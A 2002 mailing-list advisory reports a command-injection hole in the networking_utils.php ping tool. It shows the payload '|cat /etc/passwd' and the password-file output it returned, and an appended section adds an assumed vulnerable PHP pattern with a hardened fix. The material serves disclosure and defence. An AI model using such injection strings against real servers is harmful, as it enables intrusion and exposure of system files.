networking_utils.php

From: Tacettin Karadeniz (tacettinkaradenizat_private)
Date: Tue Nov 05 2002 - 13:05:56 PST


    Title:
    The bug in networking_utils.php
    (http://www.sourcecraft.org/downloads)
    networking_utils(PHP) Show Files Vulnerability
    
    Summary:
    networking_utils.php includes a ping function, a
    traceroute function, and an nslookup function.
    
    Vulnerable systems:
    networking_utils
    networking_utils.php of the networking_utils PHP
    script allows remote visitors
    to view any file on a web server.
    
    Example:
    The command entered in the "Domain name or IP
    address" field (Ping Utility):
    
    |cat /etc/passwd
    
    With this command, the password file can be viewed
    in the web browser.
    
    
    Ping Results For : |cat /etc/passwd
    
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:
    news:x:9:13:news:/var/spool/news:
    uucp:x:10:14:uucp:/var/spool/uucp:
    operator:x:11:0:operator:/root:
    mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash
    cilek:x:501:501:cilek:/home/cilek:/bin/bash
    avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash
    
    
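An added example, not part of the original post and not code from networking_utils.php (the post does not show the script's source): the assumed pattern behind the behaviour reported above, next to a hardened version that validates the field and runs ping without a shell. The function names and the `ping -c 4` command line are assumptions.

```php
<?php
// Added example. The post does not show the script's source; both functions
// below are hypothetical reconstructions of the pattern, not project code.

// Assumed vulnerable pattern: the form field is concatenated into a shell line,
// so "|cat /etc/passwd" is interpreted by /bin/sh as a second command.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec('ping -c 4 ' . $host);
}

// Accept only an IP literal or a strict LDH host name; anything else is rejected.
function validate_target(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // Labels of 1-63 chars, starting and ending alphanumeric, so no shell
    // metacharacters and no leading '-' that ping would parse as an option.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $ok = preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $host) === 1;
    return ($ok && strlen($host) <= 253) ? $host : null;
}

function ping_hardened(string $host): string
{
    $target = validate_target($host);
    if ($target === null) {
        return 'Invalid host name or IP address.';
    }
    // Array form of proc_open (PHP 7.4+) runs ping directly, with no shell.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(['ping', '-c', '4', $target], $spec, $pipes);
    if (!is_resource($proc)) {
        return 'ping could not be started.';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    // Encode before echoing the result into the HTML page.
    return htmlspecialchars((string) $out, ENT_QUOTES, 'UTF-8');
}

// Constructed inputs; only the validator runs here, no command is executed.
foreach (['192.0.2.10', 'example.org', '|cat /etc/passwd', '-example.org'] as $in) {
    printf("%-18s %s\n", $in, validate_target($in) === null ? 'rejected' : 'accepted');
}
```

The same validation applies to the script's traceroute and nslookup functions if they take the field the same way, which the post does not state.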



    This archive was generated by hypermail 2b30 : Tue Nov 05 2002 - 13:34:17 PST